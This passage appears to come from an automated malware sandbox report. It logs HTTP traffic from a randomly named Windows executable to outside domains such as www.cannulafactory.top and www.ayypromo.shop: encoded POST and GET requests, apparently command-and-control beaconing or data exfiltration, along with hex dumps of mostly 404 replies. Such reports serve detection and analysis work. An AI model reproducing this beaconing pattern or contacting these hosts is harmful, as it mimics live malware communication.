                  Data Ascii: 56gD=37FT9IHDPOAKew4ugYYz6/ADljmviC7nwkyyVnKfYWlEodLqLa3WZ74iPUeBUpKsjVoCXZckPoNkLAj3uJbZOBmcyfiRfJiX/2zWmudcaOpwAXJSUtsw0AWmRjwpfYdF0TjJk0rNz+oz9aavERc8s8gBpImlmkCS2lsxK4ECk0e4xbEiOm/q3GTtf3wzJsesJRBGl75vKEQsaRcSg/2nCiA=
                  Sep 4, 2024 09:37:27.457389116 CEST1236INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Wed, 04 Sep 2024 07:37:27 GMT
                  Content-Type: text/html
                  Content-Length: 3971
                  Connection: close
                  ETag: "6526681e-f83"
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                  Sep 4, 2024 09:37:27.457405090 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                  Sep 4, 2024 09:37:27.457416058 CEST1236INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                  Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                  Sep 4, 2024 09:37:27.457427979 CEST436INData Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6e 65 74 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 6e 67 69 6e 78 2d 6c 6f 67 6f 2e 70 6e 67 22 20 0a 20 20 20 20 20 20 20 20
                  Data Ascii: a href="http://nginx.net/"><img src="nginx-logo.png" alt="[ Powered by nginx ]" width="121" height="32" /></a> <a href="http://www.redhat.com/"><img


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  27192.168.2.44976418.183.3.45805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:37:29.123729944 CEST10865OUTPOST /l90v/ HTTP/1.1
                  Host: www.cannulafactory.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.cannulafactory.top
                  Referer: http://www.cannulafactory.top/l90v/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 65 77 34 75 67 59 59 7a 36 2f 41 44 6c 6a 6d 76 69 43 37 6e 77 6b 79 79 56 6e 4b 66 59 56 46 45 72 76 44 71 5a 70 66 57 65 37 34 69 46 30 65 41 55 70 4b 4c 6a 56 77 4f 58 5a 52 54 50 75 4a 6b 4b 6a 72 33 70 34 62 5a 46 42 6d 63 37 2f 69 51 52 70 69 6e 2f 77 53 52 6d 75 74 63 61 4f 70 77 41 52 4e 53 43 76 55 77 76 41 57 6c 51 6a 77 74 4a 6f 63 51 30 51 54 5a 6b 30 2f 33 7a 50 49 7a 39 37 71 76 49 43 30 38 7a 4d 67 44 71 49 6d 39 6d 6b 50 4d 32 68 31 64 4b 34 78 6e 6b 32 43 34 39 2f 39 6e 63 30 33 44 71 6b 66 2b 50 31 45 4c 4f 64 75 71 46 7a 4e 35 67 72 78 46 53 32 5a 50 65 79 35 38 6c 73 2f 69 66 43 2f 30 70 49 64 31 75 51 36 6e 7a 6e 4a 32 75 4f 35 51 45 48 51 33 78 63 49 48 6d 62 46 71 45 6a 4a 78 48 57 67 42 70 4f 6b 65 54 42 57 49 66 35 35 5a 47 71 70 73 53 37 6e 31 31 36 63 59 37 6e 57 72 6d 55 5a 79 32 73 53 42 68 54 78 4b 45 38 46 79 41 74 72 44 31 6d 6f 4f 76 36 6c 77 6c 4f 52 54 4b 36 33 63 4f 6e 4c 69 6d 2f 41 36 4e 38 30 45 58 6b 63 56 4c [TRUNCATED]
                  Data Ascii: 56gD=37FT9IHDPOAKew4ugYYz6/ADljmviC7nwkyyVnKfYVFErvDqZpfWe74iF0eAUpKLjVwOXZRTPuJkKjr3p4bZFBmc7/iQRpin/wSRmutcaOpwARNSCvUwvAWlQjwtJocQ0QTZk0/3zPIz97qvIC08zMgDqIm9mkPM2h1dK4xnk2C49/9nc03Dqkf+P1ELOduqFzN5grxFS2ZPey58ls/ifC/0pId1uQ6nznJ2uO5QEHQ3xcIHmbFqEjJxHWgBpOkeTBWIf55ZGqpsS7n116cY7nWrmUZy2sSBhTxKE8FyAtrD1moOv6lwlORTK63cOnLim/A6N80EXkcVLnIoci64tlyqZHnkeIdWiHox20C99XgZPlZYNmgWMPpAVfbkS0lsOHIltWAZfAJmhcXVkmW1zUPHxkA5eqn/5drzxFYy/iKAXkjZk3tTt1mFBORQTEs9m3/qcAYbcrij0Ct8vhfAJK/TRKYPiYgMLqHh3nqGAaX6+It7tQE7ztiBawXSg9EaXrlSh5f2NTYxzXMVTayT1VCuCCFSzM0hnxeU3/Qf+e2NFlltfE39LJW0jUW61/Y+PqyI2tNbyp6FjLjnT4gW+R+RlVicDl5AhxrTZGWCknwEC87pIZPUlX/YhatiTh6fVISFPEVJlPf5tQJCqwCau0rhW+tm3N5fxra1aSbavAALRa1omjf7IwAWscM0eFvOZMpBfLP/w+HY4gdLO5ekcSaoA2ysfLC5CfUaFND+0yHritGyVb52gHodiWHym286j+05o8hcT1CQNWKHcBR0v/OFfdyc6c7codfsPHwuRCFY20gzbRpuqfC3BqxRr5fsBupUgqcNi8ktpcFW12yxA26NaQzM+nuLm1sD5J6ZltCxumgxuIyMQ3it3+e9Wt6GoA0YhXDgkRzxj36sLFzn0t/hSrejnjDg3HLRYet0xTAfE4rzQUBkeq8FP58t02w+AOcJYxDzVdbVVznEdaL+NBSDniIyTjOsWsv1KxEiIhgPz5w [TRUNCATED]
                  Sep 4, 2024 09:37:30.109544039 CEST1236INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Wed, 04 Sep 2024 07:37:29 GMT
                  Content-Type: text/html
                  Content-Length: 3971
                  Connection: close
                  ETag: "6526681e-f83"
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                  Sep 4, 2024 09:37:30.109559059 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                  Sep 4, 2024 09:37:30.109569073 CEST448INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                  Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                  Sep 4, 2024 09:37:30.109941959 CEST448INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                  Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                  Sep 4, 2024 09:37:30.312815905 CEST1224INData Raw: 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 52 65 64 20 48 61 74 20 45 6e 74 65 72 70 72 69 73 65 20 4c 69 6e 75 78 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: th Red Hat Enterprise Linux. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>
                  Sep 4, 2024 09:37:30.312969923 CEST1236INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Wed, 04 Sep 2024 07:37:29 GMT
                  Content-Type: text/html
                  Content-Length: 3971
                  Connection: close
                  ETag: "6526681e-f83"
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.44976518.183.3.45805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:37:31.677473068 CEST487OUTGET /l90v/?56gD=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.cannulafactory.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:37:32.553404093 CEST1236INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Wed, 04 Sep 2024 07:37:32 GMT
                  Content-Type: text/html
                  Content-Length: 3971
                  Connection: close
                  ETag: "6526681e-f83"
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                  Sep 4, 2024 09:37:32.553422928 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                  Sep 4, 2024 09:37:32.553436041 CEST1236INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                  Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                  Sep 4, 2024 09:37:32.553447962 CEST436INData Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6e 65 74 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 6e 67 69 6e 78 2d 6c 6f 67 6f 2e 70 6e 67 22 20 0a 20 20 20 20 20 20 20 20
                  Data Ascii: a href="http://nginx.net/"><img src="nginx-logo.png" alt="[ Powered by nginx ]" width="121" height="32" /></a> <a href="http://www.redhat.com/"><img


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.449766176.57.64.102805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:37:45.760468006 CEST748OUTPOST /rgqx/ HTTP/1.1
                  Host: www.ayypromo.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.ayypromo.shop
                  Referer: http://www.ayypromo.shop/rgqx/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 6a 52 58 4d 4d 56 49 39 33 39 70 34 4b 65 46 63 2f 6d 65 6d 78 64 4c 6a 64 36 41 44 4f 6c 2b 69 70 70 52 45 41 4f 59 51 4e 5a 4f 50 76 36 62 54 33 53 75 66 39 6a 36 6e 38 56 6f 74 67 7a 2b 4f 79 7a 54 33 79 6d 4a 4f 74 61 72 56 65 62 54 30 6d 47 62 63 74 42 6e 7a 6a 36 68 76 4a 6f 47 49 2f 6f 65 67 45 73 4d 35 65 37 63 68 57 42 75 2b 37 4a 30 57 68 47 4e 70 46 54 67 48 55 49 6d 39 62 51 70 4e 54 6e 58 6f 42 71 6b 66 69 36 33 77 66 4c 51 41 33 58 52 38 65 6c 49 30 49 6f 35 58 6b 4f 39 42 69 36 51 54 32 50 6c 45 57 64 4d 59 33 36 76 4a 36 77 3d 3d
                  Data Ascii: 56gD=p58IGnZR0XdFjRXMMVI939p4KeFc/memxdLjd6ADOl+ippREAOYQNZOPv6bT3Suf9j6n8Votgz+OyzT3ymJOtarVebT0mGbctBnzj6hvJoGI/oegEsM5e7chWBu+7J0WhGNpFTgHUIm9bQpNTnXoBqkfi63wfLQA3XR8elI0Io5XkO9Bi6QT2PlEWdMY36vJ6w==
                  Sep 4, 2024 09:37:46.410078049 CEST1147INHTTP/1.1 404 Not Found
                  Server: ddos-guard
                  Connection: close
                  Set-Cookie: __ddg1_=8Lbap9FlpnO2zWswl4ge; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 04-Sep-2025 07:37:46 GMT
                  Date: Wed, 04 Sep 2024 07:37:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 738
                  Last-Modified: Fri, 30 Aug 2024 07:12:48 GMT
                  ETag: "2e2-620e151931c8a"
                  Accept-Ranges: bytes
                  X-Frame-Options: SAMEORIGIN
                  Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                  Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br> <br> <br> <b>404 Page not found</b> </td> </tr> </table> </body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.449767176.57.64.102805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:37:48.313395023 CEST768OUTPOST /rgqx/ HTTP/1.1
                  Host: www.ayypromo.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.ayypromo.shop
                  Referer: http://www.ayypromo.shop/rgqx/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 78 46 72 4d 4b 79 63 39 69 4e 70 37 48 4f 46 63 31 47 65 69 78 64 58 6a 64 37 56 59 4e 58 4b 69 70 4c 35 45 42 4d 77 51 4b 5a 4f 50 68 61 62 57 35 79 75 45 39 69 47 5a 38 55 55 74 67 31 53 4f 79 79 50 33 78 55 68 42 73 4b 72 58 52 37 54 32 37 32 62 63 74 42 6e 7a 6a 36 31 46 4a 73 71 49 2f 5a 75 67 57 39 4d 32 43 4c 63 2b 54 78 75 2b 70 35 30 53 68 47 4d 4d 46 54 51 68 55 4f 69 39 62 52 5a 4e 51 31 76 76 57 61 6b 47 6d 36 32 46 50 62 6c 45 32 6d 70 77 65 6c 41 6e 57 4b 4a 73 6f 6f 73 62 7a 4c 78 45 6b 50 42 33 4c 61 46 73 36 35 53 41 68 36 7a 64 31 44 39 4e 32 2f 73 4e 47 54 46 68 48 69 69 74 4b 66 55 3d
                  Data Ascii: 56gD=p58IGnZR0XdFxFrMKyc9iNp7HOFc1GeixdXjd7VYNXKipL5EBMwQKZOPhabW5yuE9iGZ8UUtg1SOyyP3xUhBsKrXR7T272bctBnzj61FJsqI/ZugW9M2CLc+Txu+p50ShGMMFTQhUOi9bRZNQ1vvWakGm62FPblE2mpwelAnWKJsoosbzLxEkPB3LaFs65SAh6zd1D9N2/sNGTFhHiitKfU=
                  Sep 4, 2024 09:37:49.057904005 CEST1147INHTTP/1.1 404 Not Found
                  Server: ddos-guard
                  Connection: close
                  Set-Cookie: __ddg1_=A3kFss8PfXiNO5WLImal; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 04-Sep-2025 07:37:48 GMT
                  Date: Wed, 04 Sep 2024 07:37:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 738
                  Last-Modified: Tue, 27 Aug 2024 08:59:13 GMT
                  ETag: "2e2-620a674a57ae6"
                  Accept-Ranges: bytes
                  X-Frame-Options: SAMEORIGIN
